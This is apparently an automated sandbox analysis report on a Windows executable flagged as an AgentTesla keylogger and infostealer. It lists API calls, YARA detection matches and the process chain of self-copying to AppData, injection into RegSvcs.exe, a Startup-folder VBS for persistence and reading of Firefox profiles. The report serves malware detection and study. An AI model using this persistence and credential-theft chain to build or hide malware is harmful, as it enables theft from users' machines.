Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAD3B8 NtdllDialogWndProc_W,	6_2_00EAD3B8
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAD43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	6_2_00EAD43E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E216DE GetParent,NtdllDialogWndProc_W,	6_2_00E216DE
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E216B5 NtdllDialogWndProc_W,	6_2_00E216B5
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E2167D NtdllDialogWndProc_W,	6_2_00E2167D
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAD78C NtdllDialogWndProc_W,	6_2_00EAD78C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E2189B NtdllDialogWndProc_W,	6_2_00E2189B
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EABC5D NtdllDialogWndProc_W,CallWindowProcW,	6_2_00EABC5D
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EABF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	6_2_00EABF8C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EABF30 NtdllDialogWndProc_W,	6_2_00EABF30

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_007AA1EF

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00798310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74105590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_00798310

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	0_2_007A51BD
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	2_2_00E851BD
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	6_2_00E851BD

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0074E6A0	0_2_0074E6A0
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0076D975	0_2_0076D975
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0074FCE0	0_2_0074FCE0
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007621C5	0_2_007621C5
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007762D2	0_2_007762D2
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007C03DA	0_2_007C03DA
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0077242E	0_2_0077242E
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007625FA	0_2_007625FA
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0079E616	0_2_0079E616
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007566E1	0_2_007566E1
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0077878F	0_2_0077878F
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007C0857	0_2_007C0857
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00776844	0_2_00776844
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00758808	0_2_00758808
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A8889	0_2_007A8889
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0076CB21	0_2_0076CB21
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00776DB6	0_2_00776DB6
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00756F9E	0_2_00756F9E
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00753030	0_2_00753030
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0076F1D9	0_2_0076F1D9
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00763187	0_2_00763187
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00741287	0_2_00741287
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00761484	0_2_00761484
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00755520	0_2_00755520
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00767696	0_2_00767696
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00755760	0_2_00755760
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00761978	0_2_00761978
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00779AB5	0_2_00779AB5
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007C7DDB	0_2_007C7DDB
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0076BDA6	0_2_0076BDA6
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00761D90	0_2_00761D90
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0074DF00	0_2_0074DF00
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00753FE0	0_2_00753FE0
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_012FEAE0	0_2_012FEAE0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E2E6A0	2_2_00E2E6A0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E4D975	2_2_00E4D975
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E2FCE0	2_2_00E2FCE0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E421C5	2_2_00E421C5
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E562D2	2_2_00E562D2
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EA03DA	2_2_00EA03DA
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E5242E	2_2_00E5242E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E425FA	2_2_00E425FA
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E366E1	2_2_00E366E1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E7E616	2_2_00E7E616
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E5878F	2_2_00E5878F
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E88889	2_2_00E88889
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E56844	2_2_00E56844
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EA0857	2_2_00EA0857
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E38808	2_2_00E38808
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E4CB21	2_2_00E4CB21
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E56DB6	2_2_00E56DB6
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E36F9E	2_2_00E36F9E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E33030	2_2_00E33030
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E4F1D9	2_2_00E4F1D9
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E43187	2_2_00E43187
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E21287	2_2_00E21287
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E41484	2_2_00E41484
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E35520	2_2_00E35520
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E47696	2_2_00E47696
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E35760	2_2_00E35760
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E41978	2_2_00E41978
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E59AB5	2_2_00E59AB5
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EA7DDB	2_2_00EA7DDB
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E4BDA6	2_2_00E4BDA6
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E41D90	2_2_00E41D90
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E33FE0	2_2_00E33FE0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E2DF00	2_2_00E2DF00
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_0120B128	2_2_0120B128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02854A88	3_2_02854A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02853E70	3_2_02853E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0285AD98	3_2_0285AD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_028541B8	3_2_028541B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06337E50	3_2_06337E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_063366C0	3_2_063366C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06332440	3_2_06332440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06335270	3_2_06335270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633C270	3_2_0633C270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633B318	3_2_0633B318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06337770	3_2_06337770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0633E478	3_2_0633E478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06330006	3_2_06330006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06330040	3_2_06330040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_063359C0	3_2_063359C0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E2E6A0	6_2_00E2E6A0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E4D975	6_2_00E4D975
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E2FCE0	6_2_00E2FCE0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E421C5	6_2_00E421C5
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E562D2	6_2_00E562D2
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EA03DA	6_2_00EA03DA
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E5242E	6_2_00E5242E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E425FA	6_2_00E425FA
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E366E1	6_2_00E366E1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E7E616	6_2_00E7E616
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E5878F	6_2_00E5878F
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E88889	6_2_00E88889
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E56844	6_2_00E56844
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EA0857	6_2_00EA0857
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E38808	6_2_00E38808
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E4CB21	6_2_00E4CB21
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E56DB6	6_2_00E56DB6
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E36F9E	6_2_00E36F9E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E33030	6_2_00E33030
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E4F1D9	6_2_00E4F1D9
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E43187	6_2_00E43187
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E21287	6_2_00E21287
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E41484	6_2_00E41484
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E35520	6_2_00E35520
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E47696	6_2_00E47696
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E35760	6_2_00E35760
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E41978	6_2_00E41978
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E59AB5	6_2_00E59AB5
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EA7DDB	6_2_00EA7DDB
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E4BDA6	6_2_00E4BDA6
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E41D90	6_2_00E41D90
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E33FE0	6_2_00E33FE0
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E2DF00	6_2_00E2DF00
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_01909EE0	6_2_01909EE0

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: String function: 00768900 appears 42 times
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: String function: 00747DE1 appears 36 times
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: String function: 00760AE3 appears 70 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E51940 appears 58 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E21D35 appears 38 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E49D75 appears 46 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E298C0 appears 40 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E25904 appears 50 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E42EFD appears 42 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E40AE3 appears 140 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E27DE1 appears 72 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E437CB appears 38 times
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: String function: 00E48900 appears 84 times

Source: 28uMwHvbTD.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 2.2.phagocytose.exe.10a0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.phagocytose.exe.10a0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 6.2.phagocytose.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.phagocytose.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@2/2

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007AA06A GetLastError,FormatMessageW,

0_2_007AA06A

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007981CB AdjustTokenPrivileges,CloseHandle,	0_2_007981CB
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_007987E1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E781CB AdjustTokenPrivileges,CloseHandle,	2_2_00E781CB
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_00E787E1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E781CB AdjustTokenPrivileges,CloseHandle,	6_2_00E781CB
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	6_2_00E787E1

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007AB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007AB333

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_007BEE0D

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007B83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_007B83BB

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_00744E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00744E89

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

File created: C:\Users\user\AppData\Local\roundup

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

File created: C:\Users\user\AppData\Local\Temp\aut65EA.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 28uMwHvbTD.exe	Virustotal: Detection: 81%
Source: 28uMwHvbTD.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

File read: C:\Users\user\Desktop\28uMwHvbTD.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\28uMwHvbTD.exe "C:\Users\user\Desktop\28uMwHvbTD.exe"
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Process created: C:\Users\user\AppData\Local\roundup\phagocytose.exe "C:\Users\user\Desktop\28uMwHvbTD.exe"
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\28uMwHvbTD.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\roundup\phagocytose.exe "C:\Users\user\AppData\Local\roundup\phagocytose.exe"
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\roundup\phagocytose.exe"
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Process created: C:\Users\user\AppData\Local\roundup\phagocytose.exe "C:\Users\user\Desktop\28uMwHvbTD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\28uMwHvbTD.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\roundup\phagocytose.exe "C:\Users\user\AppData\Local\roundup\phagocytose.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\roundup\phagocytose.exe"	Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
